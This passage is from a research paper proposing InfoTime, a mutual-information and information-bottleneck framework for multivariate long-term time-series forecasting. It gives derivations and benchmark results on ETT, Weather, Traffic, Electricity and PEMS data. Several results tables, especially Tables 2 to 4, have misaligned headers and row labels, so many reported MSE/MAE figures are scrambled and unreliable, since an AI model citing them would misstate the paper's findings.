enhance the seasonal-trend decomposition and achieves $O(L)$ complexity. The above methods focus on modeling temporal dependency yet omit the correlations between different variables. Crossformer (Zhang & Yan) introduces Two-Stage Attention to effectively capture cross-time and cross-dimension dependencies. Recently, several works (Murphy & Chen, 2022; Nie et al., 2022; Zeng et al., 2022) have observed that modeling cross-dimension dependency makes neural models suffer from overfitting on most benchmarks; therefore, they propose Channel-independence methods to avoid this issue. However, the improvement comes at the sacrifice of cross-variable information. Besides, existing models primarily focus on extracting correlations within the historical series while disregarding the correlations of the target series.

2.2 MUTUAL INFORMATION AND INFORMATION BOTTLENECK

Mutual Information (MI) is an entropy-based measure that quantifies the dependence between random variables, defined as:

$$I(X; Y) = \int p(x, y) \log \frac{p(x, y)}{p(x)p(y)} \, dx \, dy = E_{p(x,y)} \left[ \log \frac{p(x, y)}{p(x)p(y)} \right] \quad (1)$$

Mutual Information has been used in a wide range of domains and tasks, including feature selection (Kwak & Choi, 2002), causality (Butte & Kohane, 1999), and the Information Bottleneck (Tishby et al., 2000). The Information Bottleneck (IB) was first proposed by Tishby et al. (2000); it is an information-theoretic framework for extracting the most relevant information in the relationship of the input with respect to the output, which can be formulated as $\max I(Y; Z) - \beta I(X; Z)$.
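As a quick numerical instance of Eq. (1), the following sketch evaluates the mutual information of a small discrete joint distribution; the probability table is made up purely for illustration.

```python
import numpy as np

# I(X; Y) = sum_{x,y} p(x,y) * log( p(x,y) / (p(x) p(y)) )  -- Eq. (1), discrete case
p_xy = np.array([[0.30, 0.10],
                 [0.05, 0.55]])           # joint p(x, y); rows: x, cols: y
p_x = p_xy.sum(axis=1, keepdims=True)     # marginal p(x)
p_y = p_xy.sum(axis=0, keepdims=True)     # marginal p(y)
mi = float(np.sum(p_xy * np.log(p_xy / (p_x * p_y))))
print(mi)  # ~0.25 nats; an independent joint (p_xy = p_x p_y) would give exactly 0
```

The IB objective above trades off exactly this quantity between the pair (Y; Z), to be preserved, and the pair (X; Z), to be compressed.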
Several works (Tishby & Zaslavsky, 2015; Shwartz-Ziv & Tishby, 2017) try to use the Information Bottleneck framework to analyze deep neural networks by quantifying the mutual information between network layers and deriving an information-theoretic limit on DNN efficiency. The Variational Information Bottleneck (VIB) was also proposed (Alemi et al., 2016) to bridge the gap between the Information Bottleneck and deep learning. In recent years, many lower-bound estimators (Belghazi et al., 2018; Oord et al., 2018) and upper-bound estimators (Poole et al., 2019; Cheng et al., 2020) have been proposed to estimate MI effectively, which is useful for estimating the VIB. Nowadays, MI and the VIB have been widely used in computer vision (Schulz et al., 2020; Luo et al., 2019), natural language processing (Mahabadi et al., 2021; West et al., 2019; Voita et al., 2019), reinforcement learning (Goyal et al., 2019; Igl et al., 2019), and representation learning (Federici et al., 2020; Hjelm et al., 2018). However, Mutual Information and the Information Bottleneck remain less explored in multivariate long-term series forecasting.

3 METHOD

In multivariate time series forecasting, one aims to predict the future values of a time series \( y_t = s_{t+T+1:t+T+P} \in R^{P \times C} \) given the history \( x_t = s_{t:t+T} \in R^{T \times C} \), where \( T \) and \( P \) are the numbers of time steps in the past and future, and \( C \geq 1 \) is the number of variables. Given the time series \( s \), we divide it into a history set \( X = \{x_1, ..., x_N\} \) and a future set \( Y = \{y_1, ..., y_N\} \), where \( N \) is the number of samples. As shown in Figure 1(a), deep learning methods first extract a latent representation \( Z^i \) from \( X \) (Channel-mixing) or \( X^i \) (Channel-independence), and then generate the target series \( Y^i \) from \( Z^i \). A natural assumption is that these \( C \) series are associated, which should help to improve forecasting accuracy. Therefore, to utilize the cross-variable dependencies while eliminating superfluous information, in Section 3.1 we propose Cross-Variable Decorrelation Aware Feature Modeling (CDAM) to extract cross-variable dependencies. In Section 3.2, we introduce Temporal Correlation Aware Modeling (TAM) to predict the future series.

3.1 CROSS-VARIABLE DECORRELATION AWARE FEATURE MODELING

Recent studies (Nie et al., 2022; Zeng et al., 2022; Zhou et al., 2021; Zhang & Yan) have demonstrated that Channel-independence is more effective than Channel-mixing in achieving high-level performance. However, multivariate time series contain correlations among variables, and Channel-mixing aims to take advantage of these cross-variable dependencies to predict future series. In practice, it often fails to improve the performance of MTSF, possibly because Channel-mixing introduces superfluous information. To verify this, we introduce CDAM to extract cross-variable information while eliminating superfluous information. Specifically, inspired by the information bottleneck, CDAM maximizes the joint mutual information among the latent representation \( Z^i \), its univariate input \( X^i \), and the corresponding univariate target series \( Y^i \), while minimizing the mutual information between the latent representation \( Z^i \) of one single univariate time series and the other multivariate series input \( X^o \). Thus, we have the objective:

\[ \max I(Y^i, X^i; Z^i) \quad \text{s.t.} \quad I(X^o; Z^i) \leq I_c, \quad (2) \]
where \( I_c \) is the information constraint, \( X \) is the set of multivariate historical series, \( X^i \) is the historical series of the \( i \)-th variable, \( X^o \) denotes the other multivariate series, and \( Z^i \in R^d \) is the representation of \( X^i \), obtained by mixing in \( X^o \) and used to predict the \( i \)-th future series \( Y^i \). With the introduction of a Lagrange multiplier \( \beta \), we can maximize the objective function for the \( i \)-th channel:

\[ \mathcal{R}^i_{IB} = I(Y^i, X^i; Z^i) - \beta I(X^o; Z^i) = I(Y^i; Z^i|X^i) + I(X^i; Z^i) - \beta I(X^o; Z^i), \quad (3) \]

where \( \beta \geq 0 \) controls the trade-off between \( I(Y^i; Z^i|X^i) \), \( I(X^i; Z^i) \), and \( I(X^o; Z^i) \): a larger \( \beta \) corresponds to lower mutual information between \( X^o \) and \( Z^i \), and means that \( Z^i \) needs to retain the important information in \( X^o \) and eliminate the irrelevant information so that \( Y^i \) can still be accurately predicted. However, the mutual information terms \( I(X^i, Y^i; Z^i) \) and \( I(X^o; Z^i) \) are intractable; we now provide a variational lower bound for \( I(X^i, Y^i; Z^i) \) and an upper bound for \( I(X^o; Z^i) \).

Lower bound for \( I(X^i, Y^i; Z^i) \). The joint mutual information between the latent representation \( Z^i \), the \( i \)-th historical series \( X^i \), and the \( i \)-th target series \( Y^i \) is defined as (more details are given in Appendix A.3.1):

\[ I(X^i, Y^i; Z^i) = I(Z^i; X^i) + I(Z^i; Y^i|X^i) = \mathbb{E}_{p(z^i, y^i, x^i)} [\log p(y^i|x^i, z^i)] + \mathbb{E}_{p(z^i, x^i)} [\log p(x^i|z^i)] + H(Y^i, X^i), \quad (4) \]

where the joint entropy \( H(Y^i, X^i) = -\int p(y^i, x^i) \log p(y^i, x^i) \, dx^i dy^i \) depends only on the dataset, cannot be optimized, and can therefore be ignored. The MI can thus be simplified as:

\[ I(X^i, Y^i; Z^i) = \mathbb{E}_{p(z^i, y^i, x^i)} [\log p(y^i|x^i, z^i)] + \mathbb{E}_{p(z^i, x^i)} [\log p(x^i|z^i)] + \text{constant}. \quad (5) \]

Since \( p(y^i|x^i, z^i) \) and \( p(x^i|z^i) \) are intractable, we introduce \( p_\theta(y^i|z^i, x^i) \) and \( p_\theta(x^i|z^i) \) as variational approximations to \( p(y^i|x^i, z^i) \) and \( p(x^i|z^i) \), respectively. The variational lower bound is then (more details are given in Appendix A.3.2):

\[ I(X^i, Y^i; Z^i) - \text{constant} \geq \mathbb{E}_{p(z^i, y^i, x^i)} [\log p_\theta(y^i|x^i, z^i)] + \mathbb{E}_{p(z^i, x^i)} [\log p_\theta(x^i|z^i)] = I_v(X^i, Y^i; Z^i). \quad (6) \]

Hence, we can maximize \( I(X^i, Y^i; Z^i) \) by maximizing \( I_v(X^i, Y^i; Z^i) \). We assume the variational distributions \( p_\theta(y^i|z^i, x^i) \) and \( p_\theta(x^i|z^i) \) to be Gaussian. Thus, the first term of \( I_v(X^i, Y^i; Z^i) \) is the negative log-likelihood of the prediction of \( Y^i \) given \( Z^i \) and \( X^i \), and the second term corresponds to the reconstruction of \( X^i \) given \( Z^i \).

Upper bound for \( I(X^o; Z^i) \). Next, to minimize the MI between the latent representation \( Z^i \) and the historical series \( X^o \), we adopt the sampled vCLUB (Cheng et al., 2020), which is defined as:

\[ I_{vCLUB\text{-}S}(X^o; Z^i) = \frac{1}{N} \sum_{n=1}^{N} \left[ \log q_\theta(z^i_n | x^o_n) - \log q_\theta(z^i_n | x^o_{k'_n}) \right], \quad (7) \]

where \( (z^i_n, x^o_{k'_n}) \) is a negative pair and \( k'_n \) is uniformly selected from the indices \( 1, 2, \ldots, N \). Thus we can minimize \( I(X^o; Z^i) \) by minimizing \( I_{vCLUB\text{-}S}(X^o; Z^i) \). This enables the model to extract useful cross-variable information while eliminating irrelevant information.
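As a reading aid, here is a minimal PyTorch sketch of the sampled vCLUB estimator of Eq. (7). The diagonal-Gaussian parameterization of \( q_\theta(z^i|x^o) \), the function names, and the tensor shapes are illustrative assumptions rather than the paper's exact implementation.

```python
import torch

def vclub_s(z, mu, logvar):
    """Sampled vCLUB upper-bound estimate of I(X^o; Z^i), Eq. (7).

    z:          (N, d) latent representations z^i_n
    mu, logvar: (N, d) diagonal-Gaussian parameters of q_theta(z | x^o_n)
    """
    def log_q(z_, mu_, logvar_):
        # log N(z; mu, diag(exp(logvar))) summed over dimensions, up to the
        # constant -d/2 * log(2*pi), which cancels in the difference below
        return (-0.5 * (logvar_ + (z_ - mu_) ** 2 / logvar_.exp())).sum(-1)

    n = z.shape[0]
    perm = torch.randperm(n)                       # k'_n sampled uniformly
    positive = log_q(z, mu, logvar)                # log q(z^i_n | x^o_n)
    negative = log_q(z, mu[perm], logvar[perm])    # log q(z^i_n | x^o_{k'_n})
    return (positive - negative).mean()            # minimized as a regularizer

# toy usage with made-up shapes
N, d = 64, 16
z, mu = torch.randn(2, N, d)
logvar = torch.zeros(N, d)
print(vclub_s(z, mu, logvar))  # scalar MI upper-bound estimate
```

During training, this scalar is scaled by \( \beta \) and added to the negative of the lower bound in Eq. (6), which yields the combined loss presented next.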
$$\mathcal{L}_{IB} = \frac{1}{C} \sum_{i=1}^{C} \left[ -I_v(X^i, Y^i; Z^i) + \beta I_{vCLUB-S}(X^o; Z^i) \right] \geq -\frac{1}{C} \sum_{i=1}^{C} \mathcal{R}^i_{IB}.$$ (8) 3.2 Temporal Correlation Aware Modeling To alleviate error-accumulation effects, previous works (Nie et al., 2022; Zeng et al., 2022; Zhou et al., 2021; Zhang & Yan, 2023) use a single-step forecaster, usually a fully-connected network, to predict the future series. In contrast to an auto-regressive forecaster, a single-step forecaster assumes the predicted future time steps are independent of each other given the historical time series. The training objective of the single-step forecaster can then be expressed as follows: $$p(y^i|z^i, x^i) = \prod_{j=1}^{P} p(y^i_j|z^i, x^i)$$ (9) Figure 2: Architecture of TAM with 4x downsampling. We downsample the target series and the series produced by the single-step forecaster into four subsequences each, and then maximize the mutual information between adjacent subsequences of the forecasted and target series. Although the single-step forecaster outperforms the auto-regressive forecaster, it fails to model the temporal correlations of different timesteps in the target series. In contrast to NLP, time series data is a low-density information source (Lin et al., 2023), and one unique property of time series is that the temporal relations (e.g., the trend and the seasonality) between adjacent downsampled sub-sequences are largely preserved (Liu et al., 2022a). Based on the above observations, we propose TAM, which improves the correlation of predicted future time steps by iteratively downsampling and optimizing the mutual information between consecutive sub-sequences of both the forecasted and target series. After extracting the cross-variable feature $Z^i$, we first generate $\hat{Y}^i$ using a single-step forecaster that utilizes the historical data of the $i$-th channel $X^i$ and the cross-variable feature $Z^i$; the forecasted series $\hat{Y}$ and the target series $Y$ are then downsampled $N$ times. For the $n$-th ($n \leq N$) downsampling, we generate $m$ sub-sequences $\hat{Y} = \{\hat{Y}_1, ..., \hat{Y}_m\}$ and $Y = \{Y_1, ..., Y_m\}$, where $m = 2^n$ and $\hat{Y}_j \in R^{E \times C}$. We then maximize the mutual information between $\hat{Y}_j^i$ and its adjacent target sub-sequences $Y_{j-1}^i$ and $Y_{j+1}^i$, given $X^i$, where $1 < j < m$. Therefore, the loss function of the $n$-th downsampling can be calculated as: $$L_n = -\frac{1}{mC} \sum_{i=1}^{C} \left[ I(Y_2^i; \hat{Y}_1^i | X^i) + I(Y_{m-1}^i; \hat{Y}_m^i | X^i) + \sum_{j=2}^{m-1} \left( I(Y_{j-1}^i; \hat{Y}_j^i | X^i) + I(Y_{j+1}^i; \hat{Y}_j^i | X^i) \right) \right]$$ The variational lower bound of $I(Y_{j-1}^i; \hat{Y}_j^i | X^i)$ is as follows (more details are shown in Appendix A.3.2): $$I(Y_{j-1}^i; \hat{Y}_j^i | X^i) \geq \mathbb{E}_{p(y_{j-1}^i, \hat{y}_j^i, x^i)} \left[ \log p_\theta(y_{j-1}^i | \hat{y}_j^i, x^i) \right]$$ Furthermore, for efficiency, we assume that the time steps of a sub-sequence are independent given the adjacent sub-sequence. Therefore, $I(Y_{j-1}^i; \hat{Y}_j^i | X^i)$ can be simplified as $I(Y_{j-1}^i; \hat{Y}_j^i | X^i) = \sum_{k=1}^{E} I(Y_{j-1,k}^i; \hat{Y}_j^i | X^i)$, and we can generate an entire sub-sequence in a single step without auto-regression. For the $n$-th downsampling, TAM generates $2 \times (2^n - 1)$ sub-sequences $\hat{Y}' = \{\hat{Y}_1', \hat{Y}_2', \hat{Y}_3', ..., \hat{Y}_m'\}$; the sub-sequences that are not at the ends are predicted by their left and right adjacent sub-sequences, respectively.
We splice these $2 \times (2^n - 1)$ sub-sequences into a new series $\hat{Y}_n = \{\hat{Y}_1', \frac{\hat{Y}_1' + \hat{Y}_2'}{2}, ..., \hat{Y}_m'\}$. After $N$ rounds of downsampling, we have generated $N + 1$ series, which we use together as the final forecasting result, giving the following loss function: $$L_p = ||Y - (\lambda \sum_{n=1}^{N} \frac{\hat{Y}_n}{N} + (1 - \lambda)\hat{Y})||_2^2$$ In contrast to single-step forecasters, which generate multi-step predictions without considering the correlation between the predicted time steps, TAM explicitly models the correlation of predicted future time steps. It achieves this by iteratively downsampling and optimizing the mutual information between consecutive sub-sequences of both the forecasted and target series, which allows the model to establish more accurate representations of future sequences and thereby enhances overall predictive performance. By incorporating the correlation between predicted time steps, TAM captures the temporal dependencies within the forecasted series and the underlying patterns in the data, ensuring that the model effectively leverages the available information to generate more accurate and coherent predictions. Integrating CDAM and TAM, the total loss of InfoTime can be written as: $$L_{total} = L_{IB} + \sum_{n=1}^{N} L_n + L_p$$ 4 EXPERIMENTS In this section, we extensively evaluate the proposed InfoTime on nine real-world benchmarks using various Channel-mixing and Channel-independence models, including state-of-the-art models. Baselines. Since our method can easily be applied to deep-learning-based forecasting models, we evaluate InfoTime with several popular baselines, including the state-of-the-art method. For Channel-mixing models, we select Informer (Zhou et al., 2021), Non-stationary Transformer (Liu et al., 2022b), denoted Stationary, and Crossformer (Zhang & Yan, 2023). For Channel-independence models, we use PatchTST (Nie et al., 2022) and also propose RMLP, which consists of two linear layers with a ReLU activation and uses reversible instance normalization (Kim et al., 2021) (see Appendix A.1 for more details). Datasets. We evaluate the performance of InfoTime on nine widely-used real-world datasets. Here is a detailed description of these datasets. (1) The ETT (Zhou et al., 2021) (Electricity Transformer Temperature) dataset contains two years of data from two separate counties in China, at the 1-hour level (ETTh) and the 15-minute level (ETTm), collected from electricity transformers. Each time step contains six power-load features and the oil temperature. (2) The Electricity dataset describes the hourly electricity consumption of 321 clients from 2012 to 2014. (3) The Traffic dataset contains the road occupancy rates from various sensors on San Francisco Bay Area freeways, provided by the California Department of Transportation. (4) The Weather dataset contains 21 meteorological indicators collected at around 1,600 landmarks in the United States. (5) The PEMS (Chen et al., 2001) datasets (PEMS03, PEMS04, and PEMS08) measure the highway traffic of California in real time every 30 seconds. We follow the standard protocol that divides each dataset into training, validation, and testing subsets in chronological order. The split ratio is 6:2:2 for the ETT datasets and 7:1:2 for the others.
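Before turning to the results, the following is a minimal sketch of how the loss terms from Section 3 fit together in practice. It assumes PyTorch, Gaussian variational distributions (so the $I_v$ terms reduce to squared errors), and strided downsampling; the helper names (`vclub_s`, `downsample`, `infotime_loss`) are illustrative assumptions and are not taken from the paper, and the $L_n$ terms are omitted for brevity.

```python
import torch
import torch.nn.functional as F

def vclub_s(q_mean, z_i, x_o):
    # Sampled vCLUB upper bound on I(X^o; Z^i) (Eq. 7). q_mean is the
    # variational network predicting the mean of a unit-variance Gaussian
    # q_theta(z^i | x^o); negative pairs are formed by shuffling the batch.
    mu_pos = q_mean(x_o)
    idx = torch.randperm(x_o.size(0), device=x_o.device)
    mu_neg = q_mean(x_o[idx])
    log_pos = -0.5 * (z_i - mu_pos).pow(2).sum(dim=-1)
    log_neg = -0.5 * (z_i - mu_neg).pow(2).sum(dim=-1)
    return (log_pos - log_neg).mean()

def downsample(series, n):
    # Strided split of a (B, P, C) series into m = 2**n sub-sequences,
    # each of shape (B, P // m, C); assumes m divides P.
    m = 2 ** n
    return [series[:, j::m, :] for j in range(m)]

def infotime_loss(y, y_hat, spliced, z_i, x_i, x_i_recon, x_o, q_mean,
                  beta=1.0, lam=0.8):
    # L_IB (Eq. 8): with Gaussian variational distributions, maximizing I_v
    # reduces to minimizing prediction and reconstruction squared errors,
    # while the vCLUB-S term upper-bounds I(X^o; Z^i).
    l_ib = (F.mse_loss(y_hat, y) + F.mse_loss(x_i_recon, x_i)
            + beta * vclub_s(q_mean, z_i, x_o))
    # L_p: blend the N spliced TAM series with the single-step forecast.
    n_levels = len(spliced)
    blend = lam * sum(spliced) / n_levels + (1.0 - lam) * y_hat
    l_p = F.mse_loss(blend, y)
    # The L_n terms would be added analogously from the TAM sub-sequences.
    return l_ib + l_p
```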
4.1 Main Results Table 1 compares the forecasting accuracy of the Channel-mixing baselines and InfoTime. The results show that InfoTime consistently outperforms all three baselines, Informer, Stationary, and Crossformer, by a large margin. Moreover, the effectiveness of InfoTime is more evident for long-sequence prediction, which may be because long-sequence prediction is more difficult and more likely to lead the model to depend on superfluous cross-variable information. InfoTime shows stable performance, in contrast to the baselines, which show a sharp increase in error as the prediction length grows. For example, when the prediction length increases from 96 to 720 on the ETTm2 dataset, the forecasting error of Informer increases dramatically from 0.365 to 3.379. In contrast, InfoTime shows a much slighter increase in error. A similar tendency appears with the other prediction lengths, datasets, and baseline models as well. These results demonstrate that InfoTime makes the baseline models more robust across prediction horizons. Additionally, to study why InfoTime performs better than the baselines, we visualize the testing error for each epoch in Figure 3. Overall, InfoTime shows lower and more stable test errors compared to the baselines. Moreover, the baselines are extremely prone to overfitting in the early stages of training, a problem that InfoTime can effectively alleviate. https://archive.ics.uci.edu/ml/datasets/ElectricityLoadDiagrams20112014, http://pems.dot.ca.gov/, https://www.bgc-jena.mpg.de/wetter/. Table 1: Multivariate long-term series forecasting results on Channel-mixing models with different prediction lengths $O \in \{96, 192, 336, 720\}$. We set the input length $I$ to 96 for all models. The best result is indicated in bold font. Avg is averaged over all four prediction lengths, and Pro denotes the relative MSE or MAE reduction.
| Models | Informer | Stationary | Crossformer |
|--------|----------|------------|-------------|
| | Original | w/Ours | Original | w/Ours | Original | w/Ours |
| Metric | MSE | MAE | MSE | MAE | MSE | MAE |
| ETTH1 | | | | | | |
| 96 | 0.865 | 0.713 | 0.381 | 0.394 | 0.598 | 0.498 |
| 192 | 1.008 | 0.792 | 0.435 | 0.430 | 0.602 | 0.520 |
| 336 | 1.107 | 0.809 | 0.485 | 0.461 | 0.677 | 0.573 |
| 720 | 1.181 | 0.865 | 0.534 | 0.524 | 0.719 | 0.597 |
| Avg | 1.040 | 0.794 | 0.458 | 0.452 | 0.649 | 0.547 |
| Pro | - | 55.9% | 43.0% | - | - | 33.5% |
| ETTH2 | | | | | | |
| 96 | 3.755 | 1.525 | 0.336 | 0.390 | 0.362 | 0.393 |
| 192 | 5.602 | 1.931 | 0.468 | 0.470 | 0.481 | 0.453 |
| 336 | 4.721 | 1.835 | 0.582 | 0.534 | 0.524 | 0.487 |
| 720 | 3.647 | 1.625 | 0.749 | 0.620 | 0.512 | 0.494 |
| Avg | 4.431 | 1.729 | 0.534 | 0.504 | 0.470 | 0.457 |
| Pro | - | 87.9% | 70.9% | - | - | 20.9% |
| ETTm1 | | | | | | |
| 96 | 0.672 | 0.571 | 0.326 | 0.367 | 0.396 | 0.401 |
| 192 | 0.795 | 0.669 | 0.371 | 0.391 | 0.471 | 0.436 |
| 336 | 1.212 | 0.871 | 0.408 | 0.416 | 0.517 | 0.464 |
| 720 | 1.166 | 0.823 | 0.482 | 0.464 | 0.664 | 0.527 |
| Avg | 0.961 | 0.733 | 0.396 | 0.409 | 0.512 | 0.457 |
| Pro | - | 58.7% | 44.2% | - | - | 25.0% |
| ETTm2 | | | | | | |
| 96 | 0.365 | 0.453 | 0.187 | 0.282 | 0.201 | 0.291 |
| 192 | 0.533 | 0.563 | 0.277 | 0.351 | 0.275 | 0.335 |
| 336 | 1.363 | 0.887 | 0.380 | 0.420 | 0.350 | 0.377 |
| 720 | 3.379 | 1.338 | 0.607 | 0.549 | 0.460 | 0.435 |
| Avg | 1.410 | 0.810 | 0.362 | 0.400 | 0.321 | 0.359 |
| Pro | - | 74.3% | 50.6% | - | - | 13.7% |
| Weather| | | | | | |
| 96 | 0.300 | 0.384 | 0.179 | 0.249 | 0.181 | 0.230 |
| 192 | 0.598 | 0.544 | 0.226 | 0.296 | 0.286 | 0.312 |
| 336 | 0.578 | 0.523 | 0.276 | 0.334 | 0.319 | 0.335 |
| 720 | 1.059 | 0.741 | 0.332 | 0.372 | 0.411 | 0.393 |
| Avg | 0.633 | 0.548 | 0.253 | 0.312 | 0.299 | 0.317 |
| Pro | - | 60.0% | 43.0% | - | - | 15.7% |
| Traffic| | | | | | |
| 96 | 0.719 | 0.391 | 0.505 | 0.348 | 0.599 | 0.332 |
| 192 | 0.696 | 0.379 | 0.521 | 0.354 | 0.619 | 0.341 |
| 336 | 0.777 | 0.420 | 0.520 | 0.337 | 0.651 | 0.347 |
| 720 | 0.864 | 0.472 | 0.552 | 0.352 | 0.658 | 0.358 |
| Avg | 0.764 | 0.415 | 0.524 | 0.347 | 0.631 | 0.344 |
| Pro | - | 31.4% | 16.3% | - | - | 23.1% |
| Electricity| | | | | | |
| 96 | 0.274 | 0.368 | 0.195 | 0.300 | 0.168 | 0.271 |
| 192 | 0.296 | 0.386 | 0.193 | 0.291 | 0.186 | 0.285 |
| 336 | 0.300 | 0.394 | 0.206 | 0.300 | 0.194 | 0.297 |
| 720 | 0.373 | 0.439 | 0.241 | 0.332 | 0.224 | 0.316 |
| Avg | 0.310 | 0.397 | 0.208 | 0.305 | 0.193 | 0.292 |
| Pro | - | 32.9% | 23.1% | - | - | 9.8% |

We also list the forecasting results of Channel-independence baselines in Table 2. It is worth noting that InfoTime also outperforms the Channel-independence baselines, indicating that although Channel-independence models exhibit promising results, incorporating cross-variable features can further enhance their effectiveness. Additionally, we evaluate InfoTime on the PEMS datasets, which consist of variables with clear geographical correlations. The results in Table 3 demonstrate a significant performance gap between PatchTST and RMLP in comparison to Informer, suggesting that Channel-independence models may not be optimal in scenarios where there are clear correlations between variables. In contrast, our framework exhibits improved performance for both Channel-mixing and Channel-independence models (we also verify the effectiveness of InfoTime on synthetic data, as shown in Appendix A.2).
Table 2: Multivariate long-term series forecasting results on Channel-Independent models with different prediction lengths. We set the input length $I$ as 336 for all the models. The best result is indicated in bold font. See Table 6 in the Appendix for the full results. | Models | Metric | ETTh1 | ETTh2 | Traffic | |--------|--------|-------|-------|---------| | | | 96 | 192 | 336 | 720 | 96 | 192 | 336 | 720 | 96 | 192 | 336 | 720 | | PatchTST | Original MSE | 0.375 | 0.414 | 0.440 | 0.460 | 0.290 | 0.332 | 0.366 | 0.420 | 0.367 | 0.385 | 0.398 | 0.434 | | | MAE | 0.399 | 0.421 | 0.440 | 0.473 | 0.342 | 0.369 | 0.392 | 0.424 | 0.251 | 0.259 | 0.265 | 0.287 | | | w/Ours | 0.365 | 0.403 | 0.427 | 0.433 | 0.283 | 0.322 | 0.356 | 0.407 | 0.358 | 0.379 | 0.391 | 0.425 | | | MSE | 0.389 | 0.413 | 0.428 | 0.453 | 0.335 | 0.359 | 0.382 | 0.417 | 0.245 | 0.254 | 0.261 | 0.280 | | | MAE | 0.380 | 0.414 | 0.439 | 0.470 | 0.290 | 0.329 | 0.364 | 0.430 | 0.383 | 0.401 | 0.414 | 0.443 | | RMLP | Original MSE | 0.401 | 0.421 | 0.436 | 0.471 | 0.343 | 0.368 | 0.390 | 0.426 | 0.269 | 0.276 | 0.282 | 0.309 | | | MAE | 0.367 | 0.404 | 0.426 | 0.439 | 0.285 | 0.322 | 0.358 | 0.414 | 0.364 | 0.384 | 0.398 | 0.428 | | | w/Ours | 0.391 | 0.413 | 0.429 | 0.459 | 0.335 | 0.359 | 0.381 | 0.413 | 0.249 | 0.258 | 0.266 | 0.284 | Table 3: Multivariate long-term series forecasting results on three baselines and PEMS datasets with different prediction lengths. We set the input length $I$ as 336 for all the models. The best result is indicated in bold font. (See Table 9 for the ablation results of PEMS datasets.) | Models | Metric | PEMS03 | PEMS04 | PEMS08 | |--------|--------|--------|--------|--------| | | | 96 | 192 | 336 | 720 | 96 | 192 | 336 | 720 | 96 | 192 | 336 | 720 | | PatchTST | Original MSE | 0.180 | 0.207 | 0.223 | 0.291 | 0.195 | 0.218 | 0.237 | 0.321 | 0.239 | 0.292 | 0.314 | 0.372 | | | MAE | 0.281 | 0.295 | 0.309 | 0.364 | 0.296 | 0.314 | 0.329 | 0.394 | 0.324 | 0.351 | 0.374 | 0.425 | | | w/Ours | 0.115 | 0.154 | 0.164 | 0.198 | 0.110 | 0.118 | 0.129 | 0.149 | 0.114 | 0.160 | 0.177 | 0.209 | | | MSE | 0.223 | 0.251 | 0.256 | 0.286 | 0.221 | 0.224 | 0.237 | 0.261 | 0.218 | 0.243 | 0.241 | 0.281 | | | MAE | 0.160 | 0.184 | 0.201 | 0.254 | 0.175 | 0.199 | 0.210 | 0.255 | 0.194 | 0.251 | 0.274 | 0.306 | | RMLP | Original MSE | 0.257 | 0.277 | 0.291 | 0.337 | 0.278 | 0.294 | 0.306 | 0.348 | 0.279 | 0.311 | 0.328 | 0.365 | | | MAE | 0.117 | 0.159 | 0.146 | 0.204 | 0.103 | 0.114 | 0.130 | 0.154 | 0.116 | 0.156 | 0.175 | 0.181 | | | w/Ours | 0.228 | 0.252 | 0.246 | 0.285 | 0.211 | 0.219 | 0.236 | 0.264 | 0.215 | 0.235 | 0.242 | 0.255 | | Informer | Original MSE | 0.139 | 0.152 | 0.165 | 0.216 | 0.132 | 0.146 | 0.147 | 0.145 | 0.156 | 0.175 | 0.187 | 0.264 | | | MAE | 0.240 | 0.252 | 0.260 | 0.290 | 0.238 | 0.249 | 0.247 | 0.245 | 0.262 | 0.266 | 0.274 | 0.325 | | | w/Ours | 0.109 | 0.120 | 0.144 | 0.194 | 0.107 | 0.124 | 0.124 | 0.136 | 0.099 | 0.123 | 0.147 | 0.196 | | | MSE | 0.216 | 0.228 | 0.247 | 0.282 | 0.215 | 0.230 | 0.231 | 0.245 | 0.204 | 0.224 | 0.242 | 0.278 | | | MAE | 0.120 | 0.143 | 0.156 | 0.220 | 0.109 | 0.116 | 0.129 | 0.139 | 0.151 | 0.180 | 0.252 | 0.223 | | Stationary | Original MSE | 0.222 | 0.242 | 0.252 | 0.300 | 0.214 | 0.220 | 0.230 | 0.240 | 0.235 | 0.247 | 0.262 | 0.285 | | | MAE | 0.101 | 0.131 | 0.153 | 0.190 | 0.096 | 0.114 | 0.125 | 0.135 | 0.103 | 0.144 | 0.184 | 0.217 | | | w/Ours | 0.206 | 0.229 | 0.245 | 0.273 | 0.199 | 0.217 | 0.229 | 0.243 | 0.200 | 0.220 | 0.245 | 
0.278 |
| Crossformer | Original MSE | 0.159 | 0.233 | 0.275 | 0.315 | 0.149 | 0.216 | 0.230 | 0.276 | 0.141 | 0.162 | 0.199 | 0.261 |
| | MAE | 0.270 | 0.319 | 0.351 | 0.383 | 0.261 | 0.320 | 0.324 | 0.369 | 0.253 | 0.269 | 0.306 | 0.355 |
| | w/Ours | 0.119 | 0.166 | 0.189 | 0.223 | 0.114 | 0.139 | 0.161 | 0.171 | 0.088 | 0.108 | 0.134 | 0.171 |
| | MSE | 0.217 | 0.250 | 0.265 | 0.293 | 0.215 | 0.236 | 0.258 | 0.275 | 0.190 | 0.206 | 0.222 | 0.251 |

4.2 Ablation Study

In our approach, there are two components: CDAM and TAM. We perform an ablation study on the ETTh1, ETTh2, and Weather datasets with Informer and PatchTST. **+TAM** means that we add TAM to these baselines, and **+InfoTime** means that we add both CDAM and TAM to the baselines. We analyze the results shown in Table 4. Compared with baselines using a single-step forecaster, TAM performs better in most settings, which indicates the importance of cross-time correlation. For Channel-mixing models, we find that InfoTime improves their performance significantly and alleviates the overfitting problem effectively. For Channel-independence models, InfoTime still improves performance, which indicates that correctly establishing the dependencies between variables is an effective way to improve performance.

Table 4: Component ablation of InfoTime. We set the input length $I$ to 336 for PatchTST and 96 for Informer. The best results are in **bold** and the second best are underlined. (See Table 8 and Table 7 in the Appendix for the full ablation results.)

| Models | Metric | ETTh1 | Weather |
|--------|--------|-------|---------|
| | | Original | +TAM | +InfoTime | Original | +TAM | +InfoTime |
| 96 | MSE | 0.865 | 0.713 | 0.598 | 0.565 | 0.381 | 0.394 |
| | MAE | 0.375 | 0.399 | 0.367 | 0.391 | 0.365 | 0.389 |
| 192 | MSE | 1.008 | 0.792 | 0.694 | 0.640 | 0.435 | 0.430 |
| | MAE | 0.440 | 0.440 | 0.429 | 0.430 | 0.427 | 0.428 |
| 336 | MSE | 1.107 | 0.809 | 0.853 | 0.719 | 0.485 | 0.461 |
| | MAE | 0.460 | 0.473 | 0.435 | 0.455 | 0.433 | 0.453 |
| 720 | MSE | 1.181 | 0.865 | 0.914 | 0.741 | 0.534 | 0.524 |
| | MAE | 0.152 | 0.199 | 0.149 | 0.197 | 0.144 | 0.194 |
| 96 | MSE | 0.300 | 0.384 | 0.277 | 0.354 | 0.179 | 0.249 |
| | MAE | 0.197 | 0.243 | 0.192 | 0.238 | 0.189 | 0.238 |
